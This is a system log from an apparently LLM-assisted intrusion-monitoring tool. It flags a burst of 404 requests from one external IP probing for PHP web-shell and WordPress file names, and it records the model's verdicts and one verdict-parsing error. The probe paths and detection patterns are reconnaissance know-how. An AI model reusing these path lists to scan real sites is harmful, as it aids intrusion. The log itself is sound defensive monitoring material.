Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.007670 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:08.338059904Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /sid3.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.007695 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:08.436469038Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /d12.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.007713 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:08.502807163Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /wp-blog.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.007731 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:08.575768051Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /wp-blog-header.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.007747 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:08.662871382Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /abc.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.007834 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:08.734434537Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /55b76.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008064 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:08.800552561Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /admin-footer.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008092 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:08.866486251Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /wp-good.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008107 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:08.932862986Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /ccs.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008123 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:08.999187257Z 4.204.200.32 - - [20/Mar/2026:12:46:08 +0000] "api.admin.kovicloud.com" "GET /ws83.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008147 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:09.235647459Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /inputs.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008185 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:09.301708415Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /drhunthq.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008201 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:09.368289899Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /a5e0a.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008233 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:09.434585614Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /lib.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008256 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:09.500500559Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /gfd.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008383 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:09.605341403Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /ws81.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008404 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:09.674332332Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /domains.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008419 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:09.740781309Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /byypas.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008465 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:09.886363212Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /install.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008491 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:09.976322250Z 4.204.200.32 - - [20/Mar/2026:12:46:09 +0000] "api.admin.kovicloud.com" "GET /myfile.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008510 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.085982319Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /grsiuk.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008946 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.152925462Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /wp-p2r3q9c8k4.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.008983 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.234756581Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /wp-access.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009020 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:10.301778502Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /inege.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009040 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.367723840Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /bgymj.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009064 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.435098289Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /6kDPjgFTmvS.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009084 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.518695651Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /tx78.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009108 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:10.586076161Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /init.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009128 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.701841601Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /ws49.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009173 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.768665247Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /56c53.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009196 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.834527022Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /public/file.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009217 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:10.900442837Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /144.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009238 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:10.974032733Z 4.204.200.32 - - [20/Mar/2026:12:46:10 +0000] "api.admin.kovicloud.com" "GET /clss.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009288 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:11.058084489Z 4.204.200.32 - - [20/Mar/2026:12:46:11 +0000] "api.admin.kovicloud.com" "GET /motu.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009312 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:11.139133303Z 4.204.200.32 - - [20/Mar/2026:12:46:11 +0000] "api.admin.kovicloud.com" "GET /ajax.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009334 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:11.234423856Z 4.204.200.32 - - [20/Mar/2026:12:46:11 +0000] "api.admin.kovicloud.com" "GET /maul.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009359 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:11.426297324Z 4.204.200.32 - - [20/Mar/2026:12:46:11 +0000] "api.admin.kovicloud.com" "GET /public/wp-blog.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009384 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:11.492090215Z 4.204.200.32 - - [20/Mar/2026:12:46:11 +0000] "api.admin.kovicloud.com" "GET /wp-content/radio.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009419 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:11.557969679Z 4.204.200.32 - - [20/Mar/2026:12:46:11 +0000] "api.admin.kovicloud.com" "GET /callback.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:15.009501 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans.
Line=2026-03-20T12:46:11.625061928Z 4.204.200.32 - - [20/Mar/2026:12:46:11 +0000] "api.admin.kovicloud.com" "GET /166.php HTTP/1.1" 404 146 "-" "-" "-"
Mar 20 12:46:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:20.024428 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:46:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:20.024490 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for tfm.php path suggests probing or misconfigured resource; single event not clearly malicious but warrants attention Line=2026-03-20T12:46:01.985890551Z 10.0.1.9 - - [20/Mar/2026:12:46:01 +0000] "GET //tfm.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:29.167531 [llm] Failed to parse verdict from: {
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: "classification": "suspicious",
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: "confidence": 0.65,
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: "reason": "404 response for a suspicious PHP file (8xyz.php) often indicates probing for web shells or misconfigurations.",
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: "action": "alert",
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: "pattern_type": "prefix",
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: "pattern": " - - \"GET /8xyz.php HTTP/1.0\" 404",
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: "source_hint": "nginx",
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: "variable_fields": [
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: {"token": "2026-03-20T12:46:02.052530966Z", "type": "timestamp", "replacement": ""},
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: {"token": "10.0.1.9", "type": "ip", "replacement": ""},
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: {"token": "4.204.200.32", "type": "ip", "replacement": ""`
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: ]
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: }
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:29.167567 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: invalid character '`' after object key:value pair
Mar 20 12:46:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:29.167576 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-20T12:46:02.052530966Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /8xyz.php HTTP/1.0" 40...
Mar 20 12:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:31.935418 [observer] Pipeline: processed=5243 pattern_hits=5122 llm_calls=121 llm_errors=3 learned=3
Mar 20 12:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:31.935443 [observer] Patterns: hash=5122 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=121
Mar 20 12:46:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:34.009866 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:46:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:34.009898 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to RIP.php with a 404 suggests probing for PHP files; could be an automated scan or misconfigured client.
Line=2026-03-20T12:46:02.120804748Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /RIP.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:46:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:41.111342 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:46:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:41.111381 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP GET to a PHP file (ioxi.php) returning 404 can indicate probing for vulnerable scripts or misconfigured endpoints. Line=2026-03-20T12:46:02.187067586Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /ioxi.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:46:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:47.657798 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:46:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:47.657829 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 response to a request for /nc4.php can indicate probing for vulnerable scripts; not definitive malicious but warrants alert. Line=2026-03-20T12:46:02.269114906Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /nc4.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:46:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:52.165778 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 12:46:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:52.165815 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a request to /wp-ssfc.php suggests a probable probe for WordPress-related vulnerability files.
Line=2026-03-20T12:46:02.340337073Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /wp-ssfc.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:46:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:58.376410 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 12:46:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:58.376444 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to a PHP file returned 404, which can indicate probing for web scripts; not definitive but warrants attention. Line=2026-03-20T12:46:02.407046635Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /ws75.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:01.954918 [observer] Pipeline: processed=5250 pattern_hits=5124 llm_calls=126 llm_errors=3 learned=3
Mar 20 12:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:01.954951 [observer] Patterns: hash=5124 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=126
Mar 20 12:47:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:04.526493 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.66 action=alert pattern_type=
Mar 20 12:47:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:04.526525 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to ws78.php with a 404 Not Found could indicate probing for web shells or vulnerable scripts; not definitive abuse but warrants attention.
Line=2026-03-20T12:46:02.474313341Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /ws78.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:47:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:11.615705 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 12:47:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:11.615740 [analyzer] Source hint mismatch: LLM says "nginx/apache access log", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 20 12:47:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:20.189941 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 12:47:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:20.189976 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Requests to /000.php are commonly probed files in web server scans; 404 plus PHP file target suggests a probe rather than legitimate traffic Line=2026-03-20T12:46:02.606578512Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /000.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:47:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:26.200836 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 12:47:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:26.200874 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 on a PHP file named w3lls.php could indicate probing for vulnerable scripts or misconfiguration attempts; unusual filename in GET request stands out as potential scan.
Line=2026-03-20T12:46:02.722193037Z 10.0.1.9 - - [20/Mar/2026:12:46:02 +0000] "GET /w3lls.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32"
Mar 20 12:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:31.940153 [observer] Pipeline: processed=5258 pattern_hits=5128 llm_calls=130 llm_errors=3 learned=3
Mar 20 12:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:47:31.940197 [observer] Patterns: hash=5128 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=130
